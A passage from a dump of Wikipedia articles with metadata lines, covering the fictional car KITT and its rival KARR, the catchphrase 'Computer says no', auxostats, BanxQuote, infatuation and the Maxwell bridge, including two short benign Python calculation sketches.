Mobile Command Center KITT has access to a mobile "garage" called the F.L.A.G. Mobile Command Center, a semi-trailer truck owned by the Foundation. In most episodes, it is a GMC General. The trailer has an extendable ramp that drops down and allows KITT to drive inside even when the truck is in motion. The trailer is loaded with spare parts and equipment for KITT, and also has a computer lab where the technicians Bonnie or April would work and conduct repairs and maintenance while in transit. In "KITTnap", KITT is kidnapped, and Michael and RC3 use the tractor cab (which has been disconnected from the trailer) to go and find him. Screen-used cars A total of 23 KITT cars were made for use in filming the series, although speculation is that there were as many as 25. All except one of these cars survived until the show was cancelled; all except five of the remaining 22 cars were destroyed at the end of filming. The series had begun with five brand-new Pontiacs for the pilot presentation; then, in 1982, a train carrying new Pontiacs to dealerships derailed in California, and Universal Studios acquired the wrecked cars at a low price. The contract stipulated that the cars could not be resold for private use because of the train damage, so they had to be crushed when Universal Studios no longer needed them. Of the five that escaped that fate: one stunt car (originally at the Universal theme park) was shipped to a theme park in Australia for World Expo '88 in Brisbane, Queensland, but is now believed to be back in the US; Universal kept one 'hero' and one stunt car for use in the Entertainment Center display – the two originals have since been sold to a private collector in the US; another, a convertible, disappeared for a while before being sold to the former Cars of the Stars Motor Museum in Keswick, Cumbria, England, and was sold on to the Dezer Collection, Orlando, Florida, when Cars of the Stars closed. The fifth car is believed to be in private hands in the UK. Press releases regularly appear claiming that 'original screen-used' cars are being sold. For example, on April 4, 2007, "one of the four KITT cars used in production of the television series" was reputedly put up for sale for $149,995 by Johnny Verhoek of Kassabian Motors, Dublin, California. A December 2007 story in USA Today stated that slain real-estate developer and car aficionado Andrew Kissel had been in possession of one of the surviving cars. Some reports say that Michael Jackson bought an original KITT, and former NSYNC band member Joey Fatone also claims to have purchased one of these authentic original KITTs at auction. There have been more 'original' cars auctioned than were built in total for the show. The September 25, 2014, fifth episode of the Dutch TV programme Syndroom, featuring people with Down syndrome who wish to fulfil a dream, features Twan Vermeulen, a Knight Rider fan who wishes to meet David Hasselhoff and KITT. Together with the show's presenter he flies to L.A. to search for Hasselhoff's house. They "find" Hasselhoff on the driveway in front of his house, dusting off KITT. After KITT speaks a personal message to Twan, Hasselhoff offers to take him along for a spin in KITT, to "Freak out some people on the freeway", which they do with great pleasure for everyone involved. The right-hand-drive KITT, known as the "Official Right Hand Drive KITT" and used in the video "Jump In My Car" by David Hasselhoff, is owned by a company called Wilderness Studios Australia.
A small group of individuals who call themselves the Knight Rider Historians state that they have the most extensive research and data on the production of the series, including production call sheets and records on vehicles owned by Universal Studios while the show was in production. They purchased two of the screen-used KITT cars, which have subsequently been restored. One of the cars had appeared in the episode in which KITT was dumped into an acid pit, and appears gutted and light grey in color on screen. The cars are frequently on display; one is currently displayed in the Petersen Automotive Museum in Los Angeles. The group also recently tracked down the original F.L.A.G. semi truck and trailer used in the first seasons of the show, which are now being restored as well. The semi truck was found in a field in Idaho. The 1978 Dorsey trailer had been modified to carry race cars in the late 1980s, and the original rear ramp door used to drive KITT in and out on the series had long been removed. They plan to fully restore the trailer to appear exactly as it did during the series run, albeit at a slightly smaller scale, because the interior of the trailer seen on screen was actually an interior set on the Universal Studios lot, several feet wider than the actual trailer. Knight Industries Three Thousand (KITT) The 2008 update to Knight Rider includes a new KITT – the acronym now standing for Knight Industries Three Thousand. The KITT platform is patterned on a Shelby GT500KR and differs from the original Two Thousand unit in several ways. For example, the 2008 KITT utilizes nanotechnology, allowing the car's outer shell to change colors and morph itself temporarily into similar forms. The nanotech platform is written as needing the AI active in order to produce any of these effects, unlike the original car's gadgets and "molecular bonded shell", which allowed it to endure extreme impacts. This downside to the use of nanotech has been demonstrated when villains were able to cause significant damage, such as shooting out windows, while the AI was deactivated. KITT can also turn into two different versions of a Ford F-150 4x4 truck (one completely stock and the other with some modifications), a Ford E-150 van, a Ford Crown Victoria Police Interceptor, a special-edition Warriors In Pink Mustang (in support of breast cancer awareness month), a Ford Flex, and a 1969 Ford Mustang Mach 1, for disguise or to use the alternate modes' capabilities (such as off-road handling). The car can engage an "Attack Mode", featuring scissor/conventional hybrid doors, which allows it to increase speed and use most of its gadgets (including turbo boost). In the pilot it had a different-looking attack mode, used whenever the car needed to increase speed. The mode's downside, however, is that it only seats two. KITT is also capable of functioning submerged, maintaining life support and system integrity while underwater. While the original series stated that the original KITT was designed by Wilton Knight, the 2008 TV movie implies that Charles Graiman co-designed the car and the AI for Wilton Knight, was subsequently relocated to protect him and his family, and later designed the Knight Industries Three Thousand. KITT's weapons include a grappling hook located in the front bumper, usable in normal and attack modes; two Gatling-style guns that retract into the hood; a laser; and missile launchers usable only in attack mode, which were first used in "Knight of the Hunter".
In the Halloween episode "Knight of the Living Dead", KITT demonstrates the ability to cosmetically alter his appearance, becoming a black Mustang convertible with pink trim as a Halloween costume. This configuration had the scanner bar relocated to behind the grille. Dr. Graiman also reveals in this episode that a backup neural network exists when he suggests downloading KITT's files and reuploading them to the backup, to which KITT replies, "The backup is not me." In the pilot, KITT had shown himself capable of similarly altering his external appearance, changing his color and license plate. In "Knight of the Zodiac", KITT uses a dispenser located in his undercarriage to spread black ice, and a fingerprint generator in the glovebox to overlay the fingerprints of a captured thief over Mike's. KITT has numerous other features: an olfactory sensor that allows KITT to "smell" via an atmospheric sampling device mounted in his front bumper; turbo boost; a voice stress analyzer used to process spoken voices and determine whether someone may be lying; a computer printout that can produce hard copies of data on a dashboard-mounted printer; a backup mainframe processor; a windshield projection, used in place of the center console screen in the pilot to display extra information as well as the video communication link with the SSC; a bio-matrix scanner used to detect the health status of persons in the immediate area; a hood surface screen; an electromagnetic pulse projector that can disable any electronic circuit or device within a given area; the ability to fire disk-like objects that produce an intense heat source to deter heat-seeking projectiles; the ability to fill the cabin with tear gas to incapacitate thieves; a 3D object printer that allows for the creation of small 3D objects (such as keys) from available electronic data; a standard printer for documents and incoming faxes, located in the passenger-side dash; a small arms cache accessible via the glove box area, usually containing two 9 mm handguns with extra magazines for the occupants' protection outside KITT; a first aid kit inside the glove box that allows for field mending of physical wounds such as lost appendages; and a software program secretly built into KITT that, when activated by the SSC, turns KITT into a bomb, using his fuel as the charge and his computer as the detonator. Knight Industries Four Thousand A 1991 made-for-TV movie sequel to the 1982 series, Knight Rider 2000, saw KITT's original microprocessor unit transferred into the body of the vehicle intended to be his successor, the Knight 4000 (referred to as "KIFT" by fans).
The vehicle had numerous 21st-century technological improvements over the 1980s Pontiac Trans-Am version of KITT, such as: an amphibious mode, which allows the car to travel across water like a speedboat; a virtual-reality heads-up display (VR-HUD), which utilized the entire windshield as a video display; a microwave stun device that could remotely incapacitate a human target; a remote target assist that helps the pilot aim and fire with complete accuracy; voice-activated controls; a fax machine; an infrared scanner that could identify laser-scope rifles as well as hidden objects giving off heat; a more complex olfactory scan; a voice sampler that could simulate any voice recorded into the Knight 4000's memory; a microwave projector that could cause the temperature of targeted objects to rise quickly and either ignite or explode them; and a thermal sensor that allows the Knight 4000 to watch and record what is happening in a particular place. However, no acknowledgement of this spin-off is made in the 2008–2009 series revival. The studio was unable to use the real Pontiac Banshee IV concept car for the movie, so it instead hired Jay Ohrberg Star Cars Inc. to customize a 1991 Dodge Stealth as the Knight 4000. After filming wrapped, the custom car was used on other TV productions of the time and can also be seen, albeit briefly, as a stolen supercar in CHiPs '99, as a repainted future police vehicle in Power Rangers Time Force, in an episode of the television series Black Scorpion in March 2001, and in the hidden-camera TV series Scare Tactics. After being abandoned and unmaintained for 10 years, one of the screen-used cars was offered for sale in January 2021 by Bob's Prop Shop in Las Vegas. KARR KARR (Knight Automated Roving Robot) is a fictional, automated prototype vehicle featured as a major antagonist of KITT (Knight Industries Two Thousand) in two episodes of the 1982 original series, and as part of a multi-episode story arc in the 2008 revived series. KARR (voiced by Peter Cullen) first appeared in "Trust Doesn't Rust", aired on NBC on November 19, 1982, where he seemingly met his demise at the end. However, he was so popular with viewers that he was brought back in "K.I.T.T. vs. K.A.R.R." (this time voiced by Paul Frees), which aired on NBC on November 4, 1984. "Trust Doesn't Rust" was also printed in book form, written by Roger Hill and Glen A. Larson, following the story and general script of the original television episode while expanding some areas of the plot and adding several extra secondary characters. KARR was brought back a third time in 2009, in the episode "Knight to King's Pawn" of the 2008–2009 Knight Rider series, making him one of the very few villains of the original series and the new series to make a return appearance. KARR design and development KARR was originally designed by Wilton Knight and built by Knight Industries for military purposes for the Department of Defense. After the completion of the vehicle, the KARR processor was installed and activated. However, a programming error caused the computer to be unstable and potentially dangerous. KARR was programmed for self-preservation, but this proved to be dangerous to the Foundation's humanitarian interests. The project was suspended and KARR was stored until a solution could be found. Once KITT was constructed, it was presumed that his prototype KARR had been deactivated and dismantled.
However, the latter did not occur; KARR was placed in storage and forgotten following the death of Wilton Knight. KARR was later unwittingly reactivated by thieves in the episode "Trust Doesn't Rust" and was thought destroyed, but he reappeared in the episode "K.I.T.T. vs. K.A.R.R." and was seen to be finally destroyed by Michael and KITT. Originally KARR was identical to KITT – all black with a red scan bar. Upon KARR's return in "K.I.T.T. vs. K.A.R.R.", his scan bar is amber/yellow, but he is otherwise still the same as KITT. KARR later gets a brand-new two-tone paint job, incorporating a silver lower body into the familiar black finish. KARR's scanner originally made a low droning noise, and the sound of KARR's engine originally sounded rough, but in the return episode the scanner and the engine both sound similar to KITT's, albeit with a slight reverb effect added. In "Trust Doesn't Rust" KARR had no license plates; from his second appearance onwards he carried a California license plate reading "KARR". KARR's voice modulator showed as greenish-yellow on his dash display, a different color and design from the various incarnations of KITT's red display. Personality Unlike KITT, whose primary directive is to protect human life, KARR was programmed for self-preservation, making him a ruthless and unpredictable threat. He does not appear as streetwise as KITT, being very naïve and inexperienced and having a childlike perception of the world. This has occasionally allowed people to take advantage of his remarkable capabilities for their own gain; however, due to his ruthless nature, he sometimes uses people's weaknesses and greed as a way to manipulate them for his own goals. Despite this, he ultimately considers himself superior (always referring to KITT as "the inferior production line model") as well as unstoppable, and due to his programming, the villains do not usually get very far. KARR demonstrates a complete lack of respect or loyalty – on one occasion ejecting his passenger to reduce weight and increase his chances of escape. KARR's evil personality is also somewhat different in the comeback episode. His childlike perceptions give way to a more devious personality, completely cold and bent on revenge. His self-preservation directive is no longer in play: when KARR is close to exploding after receiving severe damage, he willingly turbo-jumps into a mid-air collision with KITT, hoping that his own destruction will also spell his counterpart's. Even KARR's modus operandi is different: subservient enough in the first episode, he now aims to actively make use of other people to serve his own needs. One explanation of this change could be the damage he received after falling over the cliff at the end of "Trust Doesn't Rust", causing further malfunctions in his programming. Indeed, KITT himself is seen to malfunction and suffer personality changes as a result of damage in several other episodes. KARR 2.0 To mirror the original series, the nemesis and prototype of the second KITT (Knight Industries Three Thousand) is also designated KARR in the new series. KARR 2.0 (Peter Cullen) is mentioned in the new Knight Rider series episode "Knight of the Living Dead" and is said to be a prototype of KITT (Knight Industries Three Thousand). The new KARR acronym was changed to "Knight Auto-cybernetic Roving Robotic-exoskeleton". KARR's visual identity has also undergone similar changes for the new series.
Instead of an automobile, a schematic display shows a heavily armed humanoid-looking robot with wheeled legs that converts into an ambiguous off-road vehicle. KARR has the ability to transform from vehicle mode into a large wheeled robotic exoskeleton, instead of KITT's "Attack Mode". The vehicle mode of KARR is a 2008–2009 Shelby GT500KR with the license plate initials K.R. KARR is once again voiced by Peter Cullen, who also voiced the first appearance of KARR in "Trust Doesn't Rust". KARR was originally designed for military combat. Armed with twin machine guns on each shoulder and missiles, the exoskeleton combines with a human being for easier control. KARR is visually identical to KITT in this iteration, lacking the two-tone black-and-silver paint job of the 1980s version of KARR; the only differences are the scanner and voice box, which are yellow compared to KITT's red. Once again, similar to the original character, this entirely different "KARR" project (2.0) had an AI that was programmed for self-preservation, and he was deactivated and placed in storage after he reprogrammed himself and killed seven people. When KARR finally appears again in the episode "Knight to King's Pawn", he takes a form once again similar to KITT, a 2008 Ford Shelby Mustang GT500KR, and is once again entirely black like the KITT Three Thousand; the only differences are his yellow scanner bar and all-yellow voice module. (In the original series the scanner was more amber/yellow, and KARR's voice module was yellow-green.) KARR's scanner sounds much lower, with much more of an echo; the sound is especially noticeable when KARR is chasing down KITT while the latter is still in Ford Mustang mode. Reception and significance KITT, despite being just an AI without a body, has proven to be a popular character. One of the reasons for KITT's attractiveness was the fact that he "domesticated" then-powerful technology (computers), making it "accessible, flexible and portable" in a way that was also "reliable and secure". Nickianne Moody has argued that, through KITT, Knight Rider became one of "the first popular texts to visualize and narrativize the potential of [computer] technologies to transform daily life"; she also argued that the relationship between Knight and KITT was more complex and nuanced than many "buddy-ship" relationships of other "Cold War warriors" in the Hollywood works of its era. KITT has also been discussed in the context of human-robot (or human-AI) interaction. KITT has also proven influential for the design of real-world computers for vehicles, with a number of studies noting that the science-fiction vision of the 1980s portrayed in the show is coming to be realized in real life in the early 21st century. Shaked and Winter noted that it was "one of the most appealing multimodal mobile interfaces of the 1980s", although, as of 2019, talking to computers in a way similar to talking to humans is still in its early stages of maturing as a technology. Various toy versions of KITT have been released. Among the best-known Knight Rider memorabilia are the remote-controlled KITT, the Knight Rider lunch box, and the deluxe version of KITT. The deluxe model of KITT, sold by Kenner Toys and dubbed the "Knight 2000 Voice Car", spoke electronically (with the actual voice of William Daniels) and featured a detailed interior and a Michael Knight action figure. ERTL released die-cast toys of KITT in three different sizes: the common miniature-sized model, a 'medium'-sized model, and a large-sized model.
These toys featured red reflective holograms on the nose to represent the scanner. In late 2004, 1/18-scale die-cast models of KITT and KARR were produced by ERTL, complete with detailed interiors and a light-up moving scanner, just as in the series. In September 2006, Hitari, a UK-based company that produces remote-control toy cars, released a Knight Rider KITT remote-control car in 1/15 scale, complete with working red scanner lights, KITT's voice from the TV show, and the car's turbine engine sound with the "cylon" scanner sound effect. In December 2012, Diamond Select Toys released a talking electronic 1/15-scale KITT which features a light-up dashboard, scanner, fog lights and tail lights, along with the original voice of KITT, William Daniels, all at the push of a button. Mattel has released two die-cast metal models of KARR: a 1:18-scale model as part of the Hot Wheels Elite collection and a 1:64-scale model as part of the Hot Wheels Retro Nostalgia Entertainment collection. Both resemble KARR's appearance from "K.I.T.T. vs. K.A.R.R.", with silver paint around the bottom half of the vehicle. The smaller one, however, lacks the amber scanner light and instead retains the red scanner from KARR's appearance in "Trust Doesn't Rust"; there is also a KITT model which is completely identical to KARR as he appeared in that first episode. KITT and KARR are both in Knight Rider: The Game and its sequel. They also appear in the Knight Rider World in Lego Dimensions. Featuring the iconic voice of William Daniels, the Knight Rider GPS was a fully working GPS unit using Mio navigational technology. The GPS featured custom-recorded voices so that the unit could "speak to" its owner by name, if the name was among the recorded set. References Text was copied/adapted from K.I.T.T. (2000) at Knight Rider Wiki, which is released under a Creative Commons Attribution-Share Alike 3.0 (Unported) (CC-BY-SA 3.0) license. External links Bringing KITT Back! as detailed in Project: K.I.T.T. Fictional artificial intelligences Fictional cars Fictional characters who can move at superhuman speeds Fictional characters with superhuman durability or invulnerability Fictional computers Knight Rider characters Pontiac (automobile) Television characters introduced in 1982
KITT
Technology
9,533
29,504,901
https://en.wikipedia.org/wiki/Computer%20says%20no
"Computer says no" is a catchphrase first used in the British sketch comedy television programme Little Britain in 2004. In British culture, the phrase is used to criticise public-facing organisations and customer service staff who rely on information stored on or generated by a computer to make decisions and respond to customers' requests, often in a manner which goes against common sense. It may also refer to a deliberately unhelpful attitude towards customers and service-users commonly experienced within British society, whereby more could be done to reach a mutually satisfactory outcome, but is not. Little Britain In Little Britain, "Computer says no" is the catchphrase of Carol Beer (played by David Walliams), a bank worker and later holiday rep and hospital receptionist, who always responds to a customer's enquiry by typing it into her computer and responding with "Computer says no" to even the most reasonable of requests. When asked to do something aside from asking the computer, she would shrug and remain obstinate in her unhelpfulness, and ultimately cough in the customer's face. The phrase was also used in the Australian soap opera Neighbours in 2006 as a reference to Little Britain. The catchphrase returns in Little Brexit, where Carol is still working at Sunsearchers as a holiday rep, confronted by a woman wanting to go to Europe. Carol uses the paraphrase "Brexit Says No", when the woman wants to go to France, Spain and Italy. Usage The "Computer says no" attitude often comes from larger companies that rely on information stored electronically. When this information is not updated, it can often lead to refusals of financial products or incorrect information being sent out to customers. These situations can often be resolved by an employee updating the information; however, when this cannot be done easily, the "Computer says no" attitude can be viewed as becoming prevalent when there is unhelpfulness as a result. This attitude can also occur when an employee fails to read human emotion in the customer and reacts according to his or her professional training or relies upon a script. This attitude also crops up when larger companies rely on computer credit scores and do not meet with a customer to discuss his or her individual needs, instead basing a decision upon information stored in computers. Some organisations attempt to offset this attitude by moving away from reliance on electronic information and using a human approach towards requests. "Computer says no" happens in a more literal sense when computer systems employ filters that prevent messages being passed along, as when these messages are perceived to include obscenities. When information is not passed through to the person operating the computer, decisions may be made without seeing the whole picture. Musician Jesca Hoop used the phrase in her 2017 song Animal Kingdom Chaotic; Pitchfork commented that "Computer screens, the implication goes, have turned us into a population of proxies who simulate doing things more than we actually do things." See also Computers Don't Argue Jobsworth Garbage in, garbage out References Comedy catchphrases Computer humour Computers Customer service English phrases Little Britain Popular culture neologisms Quotations from television 2004 neologisms 2004 quotations
Computer says no
Technology
646
13,713,557
https://en.wikipedia.org/wiki/Auxostat
An auxostat is a continuous culture device which, while in operation, uses feedback from a measurement taken on the growth chamber to control the media flow rate, holding that measurement constant. Auxo was the Greek goddess of spring growth, and as a prefix refers to nutrients. The most typical auxostats are pH-auxostats, with feedback between the growth rate and a pH meter. Other auxostats may measure oxygen tension, ethanol concentration, or sugar concentration. References Bioreactors
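The feedback loop described above is simple enough to sketch in a few lines. The following is a minimal illustration, not drawn from any cited implementation: the function and parameter names are hypothetical, and a bare proportional controller stands in for whatever control law a real instrument uses.

```python
# Minimal sketch of one pH-auxostat feedback step (hypothetical names;
# a simple proportional controller, not a production control loop).

def auxostat_step(ph_measured: float, ph_setpoint: float,
                  flow_rate: float, gain: float = 0.5,
                  max_flow: float = 2.0) -> float:
    """Return an updated media flow rate (L/h) from one pH reading.

    Growth acidifies the culture, so a pH below the setpoint suggests the
    culture is growing quickly; feeding more fresh (higher-pH) medium both
    raises the pH and supplies nutrients, closing the feedback loop.
    """
    error = ph_setpoint - ph_measured      # > 0 when culture is too acidic
    new_flow = flow_rate + gain * error    # increase feed to raise pH
    return min(max(new_flow, 0.0), max_flow)

# Example: setpoint pH 6.8, culture has drifted acidic to pH 6.5
flow = 0.4
flow = auxostat_step(6.5, 6.8, flow)  # -> 0.55 L/h
```

Because holding the pH at the setpoint indirectly pins the culture near a steady growth rate, this kind of loop exhibits the defining behaviour of a pH-auxostat.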
Auxostat
Chemistry,Engineering,Biology
103
17,630,523
https://en.wikipedia.org/wiki/BanxQuote
BanxQuote was a provider and licensor of indexes and analytics, which were used as a barometer of the U.S. banking and mortgage markets. Its bank rate website and consumer banking marketplace featured daily updated market rates on banking, mortgage and loan products in the United States, until its close in 2010. History and activities BanxQuote was established by its parent BanxCorp in 1984, and its Internet operations were launched at a BanxQuote National Banking Conference held at Salomon Brothers in New York, on April 7, 1995. Clients of the firm have included hundreds of financial institutions nationwide, and its indexes were frequently used as a trusted source and performance benchmark by public policymakers, government agencies, major banks and corporations. BanxQuote operated an online national banking marketplace for 15 years, until its exit in 2010. It featured rates on money market accounts, savings and jumbo certificates of deposit (CDs), mortgage loans, home equity and auto loans for various terms and amounts. BanxQuote also provided proprietary state-by-state, regional, and national composite benchmarks for its various banking and lending products. Starting in 1985, The Wall Street Journal featured BanxQuote for 17 consecutive years. BanxQuote on Bloomberg Terminal BanxQuote current and historical proprietary data, indices, charts and analytical tools were available on Bloomberg Terminals from 1995 until its exit from the market in 2015, reaching over 250,000 financial market professionals worldwide. The BanxQuote Index, Trademark and Performance benchmarks The Dow Jones Barron's Dictionary of Banking Terms defines the BanxQuote Money Market Index(tm) as an "Index of rates paid by investors on negotiable certificates of deposit and high yield savings accounts, compiled weekly by BanxCorp. The index offers a side-by-side comparison of rates paid by selected banks and savings institutions on small-denomination (under $10,000) savings accounts." The BanxQuote Conforming-Jumbo Mortgage Index(tm) is typically used to analyze the historical spread between national average conforming and jumbo mortgage rates. BanxQuote licensed its registered trademark, proprietary indices, data, analytical tools, and financial applications to third parties. Case studies AAA (American Automobile Association) Money Markets & CDs General Electric Capital Corp. — GE Interest Plus Ford Interest Advantage Notes issued by Ford Motor Credit Company Bloomberg Professional terminals worldwide UBS, one of the world's leading financial institutions Discover Bank, part of Discover Financial Services Countrywide Bank MetLife Bank, a subsidiary of MetLife, Inc. Capital One Direct Banking Charles Schwab & Co. Zions Bank Usage BanxQuote data are cited by various government agencies, policymakers, government-sponsored enterprises (GSEs), non-profit and religious organizations, and economists, as outlined below. U.S. government agencies The White House Council of Economic Advisers U.S. Senate Committee on Banking, Housing, and Urban Affairs U.S. Department of the Treasury Federal Deposit Insurance Corporation (FDIC) William Poole (Federal Reserve Bank president), Federal Reserve Bank of St. Louis Government Finance Officers Association Office of Federal Housing Enterprise Oversight (OFHEO) Office of Thrift Supervision (OTS) - Selected Asset and Liability Price Tables, as of June 30, 2007 Government Sponsored Enterprises (GSEs) The Role of Freddie Mac, the Federal Home Loan Mortgage Corporation: Freddie Mac Provides Stability to the Mortgage Market. Wharton Financial Institutions Center, Working Paper: Measuring the Benefits of Fannie Mae and Freddie Mac to Consumers Foundations, non-profit, judiciary, and religious organizations F.B. Heron Foundation - has established performance benchmarks for each asset class in its mission-related portfolio; the benchmark for deposits is the national average for two-year jumbo deposits as reported by BanxQuote. Michigan Court, Michigan Judicial Institute - CitiStreet Investing Webcast Diocese of Monterey, California In 2007, the bishop of Monterey established a policy that all funds of the Monterey diocese deposited in its Cash Management and Deposit and Loan programs would earn a rate tied to the BanxQuote Money Market Rate. References External links BanxQuote.com website BanxCorp corporate website Financial services companies based in New York City Retail financial services American companies established in 1984 Financial services companies established in 1984 Retail companies established in 1984 American companies disestablished in 2010 Financial services companies disestablished in 2010 Retail companies disestablished in 2010 Companies based in New York (state) Data collection News aggregators
BanxQuote
Technology
937
634,932
https://en.wikipedia.org/wiki/Infatuation
Infatuation, also known as being smitten, is the personal state of being overly driven by an uninformed or otherwise unreasonable passion, usually towards another person for whom one has developed strong romantic or sexual feelings. Psychologist Frank D. Cox said that infatuation can be distinguished from romantic love only when looking back on a particular case of attraction to a person, and that it may also evolve into mature love. Goldstein and Brandon describe infatuation as the first stage of a relationship, before it develops into a mature intimacy. Whereas love is "a warm attachment, enthusiasm, or devotion to another person", infatuation is "a feeling of foolish or obsessively strong love for, admiration for, or interest in someone or something", a shallower "honeymoon phase" in a relationship. Ian Kerner, a sex therapist, stated that infatuation usually occurs at the beginning of relationships and is "[...] marked by a sense of excitement and euphoria, and it's often accompanied by lust and a feeling of newness and rapid expansion with a person". The psychologist Adam Phillips has described how the illusions of infatuation inevitably result in disappointment when the truth about a lover is learned. Adolescents often make people the object of extravagant, short-lived passion or temporary love. Youth "It is customary to view young people's dating relationships and first relationships as puppy love or infatuation"; and if infatuation is both an early stage in a deepening sequence of love/attachment and, at the same time, a potential stopping point, it is perhaps no surprise that it is a condition especially prevalent in the first, youthful explorations of the world of relationships. Thus "the first passionate adoration of a youth for a celebrated actress whom he regards as far above him, to whom he scarcely dares lift his bashful eyes" may be seen as part of an "infatuation with celebrity especially perilous with the young". Admiration plays a significant part in this, as "in the case of a schoolgirl crush on a boy or on a male teacher. The girl starts off admiring the teacher ... [then] may get hung up on the teacher and follow him around". Then there may be shame at being confronted with the fact that "you've got what's called a crush on him ... Think if someone was hanging around you, pestering and sighing". Of course, "sex may come into this ... with an infatuated schoolgirl or schoolboy" as well, producing the "stricken gaze, a compulsive movement of the throat ... an 'I'm lying down and I don't care if you walk on me, babe', expression" of infatuation. Such a cocktail of emotions "may even falsify the 'erotic sense of reality': when a person in love estimates his partner's virtues he is usually not very realistic ... projection of all his ideals onto the partner's personality". It is this projection that differentiates infatuation from love, according to the spiritual teacher Meher Baba: "In infatuation, the person is a passive victim of the spell of conceived attraction for the object. In love there is an active appreciation of the intrinsic worth of the object of love." Distance from the object of infatuation—as with celebrities—can help maintain the infatuated state. A time-honoured cure for the one who "has a tendre ... infatuated" is to have "thrown them continually together ... by doing so you will cure ... [or] you will know that it is not an infatuation".
One study examined the possible effects of infatuation and love relationships on the academic behaviour of adolescent students. The results showed that most of the participants experienced distraction, stress, and poor academic performance as a result of love relationships and infatuation; the findings thus highlighted the detrimental effect such relationships can have on learning behaviour among teenagers. Types Three types of infatuation have been identified by Brown: the first type is characterized by being "carried away, without insight or proper evaluative judgement, by blind desire"; the second, closely related, by being "compelled by a desire or craving over which the agent has no control", while "the agent's evaluation ... may well be sound although the craving or love remains unaffected by it"; and the third is that of "the agent who exhibits bad judgement and misvaluation for reasons such as ignorance or recklessness". In transference In psychoanalysis, a sign that the method is taking hold is "the initial infatuation to be observed at the beginning of treatment", the beginning of transference. The patient, in Freud's words, "develops a special interest in the person of the doctor ... never tires in his home of praising the doctor and of extolling ever new qualities in him". What occurs, "it is usually maintained ... is a sort of false love, a shadow of love", replicating in its course the infatuations of "what is called true love". However, the writer Janet Malcolm claims that it is wrong to convince the patient "that their love is an illusion ... that it's not you she loves. Freud was off base when he wrote that. It is you. Who else could it be?"—thereby taking "the question of what is called true love ... further than it had ever been taken". Conversely, in countertransference, the therapist may become infatuated with his or her client: "very good-looking ... she was the most gratifying of patients. She made literary allusions and understood the ones he made ... He was dazzled by her, a little in love with her. After two years, the analysis ground down to a horrible halt". Intellectual infatuations Infatuations need not only involve people, but can extend to objects, activities, and ideas. "Men are always falling in love with other men ... with their war heroes and sport heroes": with institutions, discourses and role models. Thus, for example, Jung's 'initial unconditional devotion' to Freud's theories and his 'no less unconditional veneration' of Freud's person were seen at the time by both men as a 'quasi-religious infatuation' with 'a cult object'; while Freud in turn was "very attracted by Jung's personality", and perhaps "saw in Jung an idealized version of himself": a mutual admiration society, "intellectually infatuated with one another". But there are also collective infatuations: "we are all prone to being drawn into social phantasy systems". Thus, for instance, "the recent intellectual infatuation with structuralism and post-structuralism" arguably lasted at least until "September 11 ended intellectual infatuation with postmodernism" as a whole. Economic bubbles thrive on collective infatuations of a different kind: "all boom-bust processes contain an element of misunderstanding or misconception", whether it is the "infatuation with ... becoming the latest dot.com billionaire", or the one that followed with subprime mortgages, once "Greenspan had replaced the tech bubble with a housing bubble".
As markets "swung virtually overnight from euphoria to fear" in the credit crunch, even the most hardened market fundamentalist had to concede that such "periodic surges of euphoria and fear are manifestations of deep-seated aspects of human nature"—whether these are enacted in home-room infatuations or upon the global stage. Literary depictions Shakespeare's sonnets have been described as a "Poetics for Infatuation"; as being dominated by one theme, and "that theme is infatuation, its initiation, cultivation, and history, together with its peaks of triumph and devastation"—a lengthy exploration of the condition of being "subject to the appropriate disorders that belong to our infatuation ... the condition of infatuation". In Ivan Turgenev's First Love, a novella from 1860, 16-year-old Woldemar becomes rapturously infatuated with Zinaida, the beautiful daughter of a princess who lives next to his house. Even though she does spend time with him, his intense infatuation is unrequited and he sinks into depression. See also References Further reading Grohol, J. Phys.D (2006). "Love Versus Infatuation", Retrieved: Nov 24th 2008 Harville, H. PhD. (1992). Keeping the Love You Find, New York: Pocket Books. Glencoe/McGraw-Hill. (2000). Whitney, DeBruyne, Sizer-Webb, Health: Making Life Choices (pp. 494–496) Interpersonal relationships Emotions Love
Infatuation
Biology
1,882
5,052,383
https://en.wikipedia.org/wiki/Maxwell%20bridge
A Maxwell bridge is a modification of a Wheatstone bridge used to measure an unknown inductance (usually of low Q value) in terms of calibrated resistance and inductance or resistance and capacitance. When the calibrated components are a parallel resistor and capacitor, the bridge is known as a Maxwell-Wien bridge. It is named for James Clerk Maxwell, who first described it in 1873. It uses the principle that the positive phase angle of an inductive impedance can be compensated by the negative phase angle of a capacitive impedance placed in the opposite arm when the circuit is at resonance; i.e., there is no potential difference across the detector (an AC voltmeter or ammeter) and hence no current flowing through it. The unknown inductance then becomes known in terms of this capacitance. With reference to the picture, in a typical application R1 and R4 are known fixed entities, and R2 and C2 are known variable entities. R2 and C2 are adjusted until the bridge is balanced. R3 and L3 can then be calculated based on the values of the other components: R3 = R1·R4/R2 and L3 = R1·R4·C2. To avoid the difficulties associated with determining the precise value of a variable capacitance, sometimes a fixed-value capacitor is installed and more than one resistor is made variable. The bridge cannot be used for the measurement of high Q values, and it is also unsuited to coils with Q values below one because of a balance convergence problem; its use is therefore limited to the measurement of medium Q values, from 1 to 10. The frequency of the AC current used to assess the unknown inductor should match the frequency of the circuit the inductor will be used in: the impedance, and therefore the assigned inductance, of the component varies with frequency. For ideal inductors this relationship is linear, so the inductance value at an arbitrary frequency can be calculated from the inductance value measured at some reference frequency. Unfortunately, for real components the relationship is not linear, and using a derived or calculated value in place of a measured one can lead to serious inaccuracies. A practical issue in the construction of the bridge is mutual inductance: two inductors in proximity will give rise to mutual induction; when the magnetic field of one intersects the coil of the other, it will reinforce the magnetic field in that other coil, and vice versa, distorting the inductance of both coils. To minimize mutual inductance, orient the inductors with their axes perpendicular to each other, and separate them as far as is practical. Similarly, the nearby presence of electric motors, chokes and transformers (like that in the power supply for the bridge!) may induce mutual inductance in the circuit components, so the circuit should be located away from any of these. The frequency dependence of inductance values gives rise to another constraint on this type of bridge: the calibration frequency must be well below the lesser of the self-resonance frequencies of the inductor and of the capacitor, f < min(f_srf(L), f_srf(C))/10. Before those limits are approached, the ESR of the capacitor will likely have a significant effect and have to be explicitly modeled. For ferromagnetic-core inductors there are additional constraints: there is a minimum magnetization current required to magnetize the core of an inductor, so the current in the inductor branches of the circuit must exceed that minimum but must not be so great as to saturate the core of either inductor.
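Once the bridge is nulled, the balance equations above reduce the measurement to simple arithmetic. The sketch below uses the same component labels as the description above; the function name and the example values are illustrative assumptions, not taken from any real measurement.

```python
# Minimal sketch: computing the unknown coil from the Maxwell bridge
# balance equations (R3 = R1*R4/R2, L3 = R1*R4*C2).

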